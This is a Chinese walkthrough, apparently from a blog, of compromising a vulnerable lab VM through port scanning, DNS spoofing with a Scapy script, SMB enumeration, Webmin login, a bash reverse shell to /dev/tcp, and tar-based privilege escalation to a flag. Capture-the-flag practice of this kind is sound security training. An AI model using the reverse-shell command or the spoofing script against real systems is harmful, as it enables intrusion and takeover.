帝国突围改版box渗透

端口扫描，查找内网存活主机

成功扫描到可疑IP 192.168.101.131

端口扫描

进80端口审查元素可以看到密码：

进10000和20000端口均为webmin的管理界面，推测密码与这个有关

由于box开启smb服务，尝试连接smb服务器：

发现失败，使用wireshark监听数据包，发现box想要请求vulnerablevm111.localdomain的IP地址，但网关返回NXDomain。

尝试搭建bind服务器，替换原有DNS服务器，添加解析记录vulnerablevm111.localdomain：

配置虚拟机DNS：

发现仍然失败，网关并未转发box的A记录请求给搭建的DNS服务器(192.168.101.129)：

既然网关不转发，那就自行搭建一个DNS数据包嗅探器，主动响应vulnerablevm111.localdomain的A记录请求：

# coding utf-8
import scapy.packet
from scapy.all import *
import socket
import threadingfrom scapy.layers.dns import DNS, DNSQR, DNSRR
from scapy.layers.inet import IP, UDP# should end with a "."
domain = b'vulnerablevm111.localdomain'def callback(pkt: scapy.packet.Packet):try:print(pkt.getlayer(DNS))if pkt.haslayer(DNS) and domain in pkt[DNS].qd.qname \and pkt[DNS].qr == 0:serverIp = pkt[IP].dstrealResolverIp = pkt[IP].srcserverPort = pkt[UDP].dportrealResolverPort = pkt[UDP].sportqueryName = pkt[DNS].qd.qnameqid = pkt[DNS].idsend(IP(src=serverIp, dst=realResolverIp)/ UDP(sport=serverPort, dport=realResolverPort)/ DNS(id=qid, qr=1, opcode='QUERY', aa=0, tc=0, rd=1, ra=0, z=0, ad=0, cd=0, rcode='ok', qdcount=1,ancount=1, nscount=0, arcount=0,qd=(DNSQR(qname=queryName, qtype='A')),an=(DNSRR(rrname=queryName, ttl=3600, type='A', rdata='192.168.101.131'))))print('send ok')except Exception as e:traceback.print_exc()def port53Listen():udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)try:udp_socket.bind(("", 53))except OSError:# another service is using port 53, which should be finereturnwhile True:udp_socket.recvfrom(0)# if os.geteuid() != 0:
#     print('Please run in root')
#     exit(1)# stop named service in case it will affect our response
# os.system('service named stop')# open 53 port
t = threading.Thread(target=port53Listen)
t.daemon = True
t.start()flt = 'udp dst port 53'
print(f'start listen, filter: {flt}')
# start 53 port listen and response
sniff(prn=callback, filter=flt, iface='VMware Network Adapter VMnet8')

成功收到服务器响应。

使用enum4linux遍历smb用户：

发现用户名：masterchef

使用之前获取的密码broccoli登录webmin，发现20000端口可以进入：

左下角进入webmin终端，发现一个welcome.txt文件

尝试使用bash反弹shell：

box执行：

bash -c 'exec bash -i &>/dev/tcp/192.168.101.128/8888 <&1'

kali nc嗅探，得到shell

tar文件可执行

进入var文件夹，发现backups下面有文件：

里面有一串字符串：Ts&4&YurgtRX(=~h

怀疑是root密码，尝试登录root：

登录失败，怀疑该备份文件与之前的tar程序有关，尝试使用tar程序压缩和解压这个文件：

获取到另一个密码：

成功获取到flag：FLAG{UH0H_1_H4V3_B33N_3XP053D!1!1@@}

帝国突围改版box渗透相关推荐

Java帝国对Python的渗透能成功吗？
作者 | 刘欣转载自码农翻身(公众号 ID:coderising) 引子 Java 帝国已经成立 20 多年,经过历代国王的励精图治,可以说是地大物博,码农众多. 可是国王依然不满足,整天想着如何继 ...
Java 帝国对 Python 的渗透能成功吗？
作者 | 刘欣责编 | 屠敏本文经授权转载自码农翻身( ID:coderising) 5G之后,中国的人工智能发展趋势如何? https://edu.csdn.net/topic/ai30?utm ...
[网络安全自学篇] 六十三.hack the box渗透之OpenAdmin题目及蚁剑管理员提权（四）
在撰写这篇文章之前,我先简单分享下hack the box实验感受.hack the box是一个在线渗透平台,模拟了真实环境且难度较大,各种Web渗透工具及操作串联在一起,挺有意思的.本文详细讲解了 ...
[网络安全自学篇] 三十九.hack the box渗透之DirBuster扫描路径及Sqlmap高级注入用法（三）
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文详细讲解了hack the box在线渗透平台注册过程,以及Web渗透三道入 ...
[网络安全自学篇] 三十八.hack the box渗透之BurpSuite和Hydra密码爆破及Python加密Post请求（二）
这是作者的系列网络安全自学教程,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文详细讲解了hack the box在线渗透平台获取邀请码.注册过程.本文将分 ...
网络渗透测试的概念以及作用
渗透测试的概念渗透测试是通过完全模拟恶意黑客的攻击方法技术,来评估计算机系统安全的一种评估方法.可以对被测计算机系统安全做深入的探测和评估,这个过程包括对系统任何弱点.技术缺陷或漏洞的主动分析,发现 ...
写技术文章也挺好的，虽然没有多少人看
微信改版信息流以后,正式进入了"拼标题"时代,如果没有一个吸引眼球.摄人心魄,不点进来心里就痒痒的标题,那阅读量肯定是嗖嗖地下降. 偏偏我又不擅长此道,绞尽脑汁想了个自以为是10w ...
1400小时开源语音数据集，你想要都在这儿
整理 | 一一出品 | AI科技大本营(ID:rgznai100) 3 月 1 日,由 Mozilla 基金会发起的 Common Voice 项目,发布新版语音识别数据集,包括来自 42000 名 ...
弃Java、Swift于不顾，为何选Python？
作者 | JACE HARR 译者 | 姜松浩转载自 CSDN(ID:CSDNNews) 以下为译文: 刚入行的程序员总是询问他们应该从哪种语言开始,我告诉他们,他们应该首先学习 Python.以下 ...

帝国突围改版box渗透

帝国突围改版box渗透相关推荐

最新文章

热门文章